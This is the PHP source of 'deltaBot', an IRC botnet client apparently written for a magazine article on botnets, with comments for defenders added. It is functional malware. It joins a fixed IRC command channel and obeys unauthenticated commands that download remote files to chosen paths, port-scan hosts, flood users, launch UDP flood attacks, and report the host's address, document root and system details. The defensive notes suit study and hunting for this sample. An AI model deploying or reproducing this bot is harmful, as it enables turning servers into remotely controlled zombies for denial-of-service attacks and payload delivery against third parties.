<?php
/*
#
# deltaBot v0.1.1
#
# A simple PHP IRC bot to illustrate the
# inner workings of a traditional botnet.
#
# By using this script you agree that the
# creator is by no means responsible for
# your actions and cannot be held liable
# for any damage you might inflict on
# third-party property. This file has been
# created for educational purposes only,
# during the writing of an article on
# botnets and information security for
# a magazine publication in Greece.
#
# Please leave feedback at: bruteforce.gr/deltabot
#
# This file is distributed under the terms of GPLv3.
#
*/
//We don't want the bot to stop: lift PHP's execution time limit so the
//request that launched this script can keep running while the IRC loop is alive.
//Defender note: a web-served script that calls set_time_limit(0) and then holds
//a long-lived outbound socket is worth alerting on; hosts that do not need it
//can list set_time_limit in php.ini's disable_functions.
set_time_limit(0);
//Print PHP errors into the page output instead of hiding them.
ini_set('display_errors', 'on');
//deltaBot: a single-class IRC client that connects to a fixed server/channel,
//reads lines in a loop and dispatches on "!command" words seen in the channel.
//Reading notes for analysts and defenders:
// - Dispatch in main() looks only at the 4th space-separated token of a line;
//   the sender prefix and the IRC command word are never inspected.
// - Everything the bot does is reported back to the configured channel, so the
//   channel traffic itself is a log of its activity.
// - Host-level controls that apply to this code: egress filtering of outbound
//   IRC (TCP 6667 here) and UDP from web servers, and php.ini hardening
//   (disable_functions for system/fsockopen, allow_url_fopen=Off, open_basedir).
class deltaBot {
//Do you run it locally or on a (zombie) server?
//Only affects the USER line sent in start().
var $localhost = TRUE;
//Bot's version
var $version = '0.1.1';
//IRC server connection details
//These literals double as indicators when hunting for this sample: server name,
//port, channel, real-name field and the nick prefix (a random number between
//0 and 'maxrand' is appended to 'nick' in start()).
var $config = array(
'server' => 'unix.webchat.my',
'port' => 6667,
'channel' => '#unix',
'name' => 'spaceinvader',
'nick' => 'beware',
'pass' => '',
'maxrand' => 150,
);
//Variable to store our IRC connection
var $conn;
//Array to save the server/client messages using explode()
var $ex = array();
//Function that starts the bot and connects to the IRC server
//Opens a TCP connection (30 s connect timeout), registers with PASS/USER/NICK,
//joins the configured channel and then enters main(), which blocks.
//The fsockopen() result is not checked before it is used.
function start()
{
$this->conn = fsockopen($this->config['server'], $this->config['port'], $e, $s, 30);
if(strlen($this->config['pass']) > 0)
{
//NOTE(review): the string below has no variable in it, so what goes on the wire
//is the literal text config['pass'] rather than the configured value.
$this->send("PASS config['pass']");
}
if(!$this->localhost) {
//On a web host the USER line carries $_SERVER['SERVER_ADDR'] and
//$_SERVER['SERVER_NAME'], i.e. the host's address and name are disclosed to
//the IRC server at registration.
$this->send("USER ".$this->config['nick']." ".$_SERVER['SERVER_ADDR']." ".$_SERVER['SERVER_NAME']." :".$this->config['name']);
}
else {
$this->send("USER deltaBot 127.0.0.1 localhost :".$this->config['name']);
}
//Nick is the configured prefix plus a random integer in 0..maxrand.
$this->send("NICK ".$this->config['nick'].mt_rand(0,$this->config['maxrand']));
$this->join($this->config['channel']);
$this->main();
}
//Bot's main function
//Reads the connection line by line until EOF, answers PING, and runs the
//command named by the 4th token of each line.
function main()
{
while(!feof($this->conn))
{
//Take the data from the server and remove \r\n
//At most 255 bytes are read per call; the raw line is echoed to the page as is.
$data = trim(fgets($this->conn, 256));
echo $data;
flush();
//Break messages into their components
$this->ex = explode(' ', $data);
//Play ping pong with the IRC server to stay connected
if($this->ex[0] == 'PING')
{
$this->send("PONG ".$this->ex[1]);
}
//The 4th word of each message corresponds to the given command
//The @ hides the notice raised when a line has fewer than four tokens.
@$command = $this->ex[3];
//List of available commands, executable by the bot
//Nothing before this switch checks who sent the line or what kind of IRC
//message it is; any line whose 4th token matches a case label is acted on.
switch($command)
{
//Join a channel, syntax: !join <#channel1> [#channel2]
case ':!join':
for($i=4; $i<(count($this->ex)); $i++)
{
$this->join($this->ex[$i]);
}
break;
//Part from a channel, syntax: !part <#channel1> [#channel2]
case ':!part':
for($i=4; $i<(count($this->ex)); $i++)
{
$this->part($this->ex[$i]);
}
break;
//Say something to a user/channel, syntax: !say <user/#channel> <message>
case ':!say':
$message = "";
for($i=5; $i<=(count($this->ex)); $i++)
{
$message .= $this->ex[$i]." ";
}
$this->send("PRIVMSG ".$this->ex[4]." :$message");
break;
//Display the bot's version, syntax: !version
case ':!version':
$this->send("PRIVMSG ".$this->config['channel']." :".$this->version);
break;
//Display each zombie's uptime, syntax: !uptime
//Runs the fixed command "uptime" through system(); no channel input reaches the
//command line. Defender note: a web server process spawning "uptime" is an
//observable process event, and system can be listed in disable_functions.
case ':!uptime':
$uptime = system("uptime");
$this->send("PRIVMSG ".$this->config['channel']." :$uptime");
break;
//Display information about each zombie's web server, syntax: !server
//Discloses SERVER_SOFTWARE and DOCUMENT_ROOT to the channel.
case ':!server':
$software = $_SERVER['SERVER_SOFTWARE'];
$docroot = $_SERVER['DOCUMENT_ROOT'];
$this->send("PRIVMSG ".$this->config['channel']." :Server: $software, Document Root: $docroot");
break;
//Display system information about each zombie, syntax: !system
case ':!system':
$this->send("PRIVMSG ".$this->config['channel']." :".php_uname());
break;
//Download a file to each zombie, syntax: !download <URL> [path]
//Both the URL and the destination path are taken verbatim from the channel
//line; the default destination /tmp/file.delta is a file-system indicator.
case ':!download':
if(!isset($this->ex[4]))
{
$this->send("PRIVMSG ".$this->config['channel']." :[--> Please give the file's URL!]");
break;
}
if(!isset($this->ex[5]))
{
$path = '/tmp/file.delta';
}
else
{
$path = $this->ex[5];
}
$this->download($this->ex[4], $path);
break;
//Flood a user/channel, syntax: !tsunami <user/#channel> [rounds]
//Sends one fixed PRIVMSG per second; the round count comes from the channel
//line and is not validated (default 20).
case ':!tsunami':
$tsunami = "TSUNAMIIII!! hahah!!";
if(!isset($this->ex[4]))
{
$this->send("PRIVMSG ".$this->config['channel']." :[--> Please give the user/#channel to flood!]");
break;
}
if(isset($this->ex[5]))
{
$rounds = $this->ex[5];
}
else
{
$rounds = 20;
}
$this->send("PRIVMSG ".$this->config['channel']." :[\002Starting Tsunami flood @ ".$this->ex[4]." for $rounds rounds...\002]");
for($i=0; $i<$rounds; $i++)
{
$this->send("PRIVMSG ".$this->ex[4]." :$tsunami");
sleep(1);
}
$this->send("PRIVMSG ".$this->config['channel']." :[\002Finished Tsunami flood @ ".$this->ex[4]." for $rounds rounds!\002]");
break;
//Scan a host/IP for open ports, syntax: !portscan <host/IP> [comma separated ports]
//Host and port list are taken verbatim from the channel line.
case ':!portscan':
if(!isset($this->ex[4]))
{
$this->send("PRIVMSG ".$this->config['channel']." :[--> Please give the host/IP to scan!]");
break;
}
$host = $this->ex[4];
if(isset($this->ex[5]))
{
$ports = $this->ex[5];
}
else
{
$ports = '21,22,23,25,53,80,110,443,445,8080';
}
$this->portscan($host, $ports);
break;
//Flood a host/IP using UDP packets, syntax: !udpflood <host/IP> [duration]
//Host and duration are taken verbatim from the channel line.
case ':!udpflood':
if(!isset($this->ex[4]))
{
$this->send("PRIVMSG ".$this->config['channel']." :[--> Please give the host/IP to flood!]");
break;
}
$host = $this->ex[4];
if(isset($this->ex[5]))
{
$duration = $this->ex[5];
}
else
{
$duration = 30; //seconds
}
$this->udpflood($host, $duration);
break;
//Restart the bot, syntax: !restart
case ':!restart':
$this->restart();
exit;
//Shutdown the bot, syntax: !shutdown
case ':!shutdown':
$this->shutdown();
exit;
//Display help, syntax: !help
case ':!help':
$this->help();
break;
}
}
}
//Sends messages to the IRC server and displays them in the browser
//The message is written to the socket with a trailing CRLF and echoed into the
//page inside <strong> tags without HTML escaping.
function send($msg)
{
fputs($this->conn, $msg."\r\n");
echo '<strong>'.$msg.'</strong><br />';
}
//Joins a channel
function join($channel)
{
$this->send("JOIN $channel");
}
//Parts from a channel
function part($channel)
{
$this->send("PART $channel");
}
//Restarts the bot
//Only emits an HTML meta refresh (5 seconds); the caller then exits, so the
//restart presumably depends on a browser having the page open and reloading it.
function restart()
{
echo "<meta http-equiv=\"refresh\" content=\"5\">";
}
//Shuts down the bot
//Sends QUIT with the configured 'name' as the quit text; the caller then exits.
function shutdown()
{
$this->send("QUIT ".$this->config['name']);
}
//Downloads a file to each zombie
//$url is fetched with file() and written line by line to $path; progress and
//errors are reported to the channel.
//The destination is opened in "w" mode before the fetch, so an existing file
//at $path is truncated even when the fetch then fails.
//Defender note: fetching a remote URL through file() relies on PHP's URL
//wrappers (allow_url_fopen); open_basedir limits where $path can point.
function download($url, $path)
{
if(!$fp = fopen($path, "w"))
{
$this->send("PRIVMSG ".$this->config['channel']." :[--> You don't have write permissions to $path, please choose another path!]");
}
else
{
if(!$get = file($url))
{
$this->send("PRIVMSG ".$this->config['channel']." :[--> Unable to download file, please check the URL!]");
}
else
{
$this->send("PRIVMSG ".$this->config['channel']." :[\002Downloading file from $url to $path ...\002]");
for($i=0; $i<count($get); $i++)
{
fwrite($fp, $get[$i]);
}
$this->send("PRIVMSG ".$this->config['channel']." :[\002Finished download!\002]");
}
fclose($fp);
}
}
//Runs a port scan against a host/IP
//$ports is a comma-separated string; each entry is tried in order with a full
//TCP connect (10 s timeout) and reported to the channel as OPEN or CLOSED.
//The @ hides connection warnings, so failures leave no PHP error output.
//Defender note: on the wire this is a sequence of outbound TCP connection
//attempts from the web host to one destination across unrelated ports.
function portscan($host, $ports)
{
$port = array();
$port = explode(',',$ports);
$this->send("PRIVMSG ".$this->config['channel']." :[\002Starting Port Scan @ ".$host." for ".(count($port))." ports...\002]");
for($i=0; $i<(count($port)); $i++)
{
$fp = @fsockopen($host, $port[$i], $e, $s, 10);
if($fp)
{
$this->send("PRIVMSG ".$this->config['channel']." :[Port ".$port[$i]." @ ".$host." is OPEN]");
fclose($fp);
}
else
{
$this->send("PRIVMSG ".$this->config['channel']." :[Port ".$port[$i]." @ ".$host." is CLOSED]");
}
}
$this->send("PRIVMSG ".$this->config['channel']." :[\002Finished Port Scan @ ".$host." for ".(count($port))." ports!\002]");
}
//Executes a UDP flood attack against a host/IP
//One 256-byte random payload is built up front and reused; until
//time() + $duration is reached, each pass opens a UDP socket to a random port
//in 0..8080, writes the payload and closes the socket.
//Defender note: the traffic shape is identical 256-byte datagrams from one
//source to many ports of one destination; a web server rarely needs outbound
//UDP beyond DNS, so egress rules and flow alerts cover this.
function udpflood($host, $duration)
{
$packet = "";
for($i=0; $i<256; $i++)
{
$packet .= chr(mt_rand(0,255));
}
$this->send("PRIVMSG ".$this->config['channel']." :[\002Starting UDP flood attack @ $host for $duration seconds...\002]");
$max_time = time() + $duration;
while(time() < $max_time)
{
if($fp = fsockopen('udp://'.$host, mt_rand(0,8080), $e, $s, 5))
{
fwrite($fp, $packet);
fclose($fp);
}
}
$this->send("PRIVMSG ".$this->config['channel']." :[\002Finished UDP flood attack @ $host !\002]");
}
//Displays available bot commands
//Sends four fixed PRIVMSG lines listing the command names to the channel.
function help()
{
$this->send("PRIVMSG ".$this->config['channel']." :[\002List of available commands\002]");
$this->send("PRIVMSG ".$this->config['channel']." :[!say, !join, !part, !restart, !shutdown]");
$this->send("PRIVMSG ".$this->config['channel']." :[!download, !tsunami, !portscan !udpflood]");
$this->send("PRIVMSG ".$this->config['channel']." :[!uptime, !server, !system !version !help]");
}
}
//Create the bot and start it
//start() connects and then calls main(), so this call does not return until
//the IRC connection reaches EOF or a !restart / !shutdown command calls exit.
$bot = new deltaBot;
$bot->start();
?>